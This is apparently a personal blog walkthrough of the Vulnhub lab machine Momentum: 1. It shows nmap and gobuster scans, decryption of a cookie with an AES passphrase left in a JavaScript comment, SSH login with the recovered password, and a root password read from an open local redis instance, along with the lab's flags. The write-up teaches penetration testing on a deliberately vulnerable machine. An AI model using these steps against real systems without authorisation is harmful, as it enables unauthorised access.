Sign in Subscribe
Vulnhub

Momentum Vulnhub Walkthrough

In this write-up, we will be solving Momentum: 1 from Vulnhub. This machine is rated easy and created by @AL1ENUM. It takes us through exploiting a JS function to retrieve the SSH credentials and then exploiting the redis-cli to get the root password.

Madhav Mehndiratta

4 min read
Momentum Vulnhub Walkthrough

Initial Enumeration and User Shell

I started the initial enumeration by running a port scan using nmap to look for open ports and default scripts.

┌──(madhav㉿kali)-[~/ctf/vulnhub/momentum1]=
└─$ nmap -sC -sV -oN nmap/initial 192.168.29.186=
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-17 10:28 IST=
Nmap scan report for 192.168.29.186=
Host is up (0.015s latency).=
Not shown: 998 closed ports=
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5c:8e:2c:cc:c1:b0:3e:7c:0e:22:34:d8:60:31:4e:62 (RSA)
|   256 81:fd:c6:4c:5a:50:0a:27:ea:83:38:64:b9:8b:bd:c1 (ECDSA)
|_  256 c1:8f:87:c1:52:09:27:60:5f:2e:2d:e0:08:03:72:c8 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Momentum | Index 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds

We have only two ports opened, so let's start the enumeration by visiting port 80 in our web browser.

We do not have anything interesting here, so next I performed a gobuster scan to search for hidden files and directories.

┌──(madhav㉿kali)-[~/ctf/vulnhub/momentum1]
└─$ gobuster dir -u http://192.168.29.186 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.29.186
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/06/17 10:31:26 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 314] [--> http://192.168.29.186/img/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.29.186/css/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.29.186/manual/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.29.186/js/]    
/server-status        (Status: 403) [Size: 279]

===============================================================
2021/06/17 10:35:13 Finished
===============================================================

There are some common source directories. It's always good to read the source code to find vulnerabilities. I visited the /js directory which has a file named main.js which contains some useful information.

function viewDetails(str) {

  window.location.href = "opus-details.php?id="+str;
}

/*
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
*/

Here, we have this named opus-details.php with a parameter id. I visited the page and checked for LFI and RCE but none of them worked.

But when I checked the document cookies, we got a cookie set after visiting opus-details.php.

This cookie seems like some sort of encrypted string. Okay so now we have a Crypto function, a secret passphrase and an encrypted string. So let's head over to jsfiddle.net and try to decrypt it.

I imported the CryptoJS Library in the HTML:

<head>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>
</head>

And then decrypted the hash using the following code in JS:

var encrypted = "U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt";
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));

After running the code we get the output - auxerre-alienum##.

This is the login password for SSH, we can login via SSH using the username auxerre and password auxerre-alienum##.

After logging in, we can read our first flag present in the home directory of user auxerre.

┌──(madhav㉿kali)-[~/ctf/vulnhub/momentum1]
└─$ ssh auxerre@192.168.29.186                                               
auxerre@192.168.29.186's password:
Linux Momentum 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 22 08:47:31 2021
auxerre@Momentum:~$ ls
user.txt
auxerre@Momentum:~$ cat user.txt
[ Momentum - User Owned ]
---------------------------------------
flag : 84157165c30ad34d18945b647ec7f647
---------------------------------------

Root Shell

I tried running some linux enumeration scripts but did not find anything interesting, I also checked for SUIDs but did not find anything useful.

Next, I looked for open ports using the ss command and found a port listening internally.

auxerre@Momentum:~$ ss -tulnp
Netid              State               Recv-Q              Send-Q                           Local Address:Port                           Peer Address:Port
udp                UNCONN              0                   0                                      0.0.0.0:68                                  0.0.0.0:*
tcp                LISTEN              0                   128                                  127.0.0.1:6379                                0.0.0.0:*
tcp                LISTEN              0                   128                                    0.0.0.0:22                                  0.0.0.0:*
tcp                LISTEN              0                   128                                      [::1]:6379                                   [::]:*
tcp                LISTEN              0                   128                                          *:80                                        *:*
tcp                LISTEN              0                   128                                       [::]:22                                     [::]:*

Port 6379 is used by redis-cli. We can connect to it using the redis-cli command.

auxerre@Momentum:~$ redis-cli 
127.0.0.1:6379> KEYS *
1) "rootpass"

We have a key named rootpass. When we open it, we get the login password for user root.

127.0.0.1:6379> GET rootpass
"m0mentum-al1enum##"

Now we can use su command to switch to user root and read our final flag.

auxerre@Momentum:~$ su root
Password: 
root@Momentum:/home/auxerre# cd
root@Momentum:~# cat root.txt 
[ Momentum - Rooted ]
---------------------------------------
Flag : 658ff660fdac0b079ea78238e5996e40
---------------------------------------
by alienum with <3

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Christi du Toit.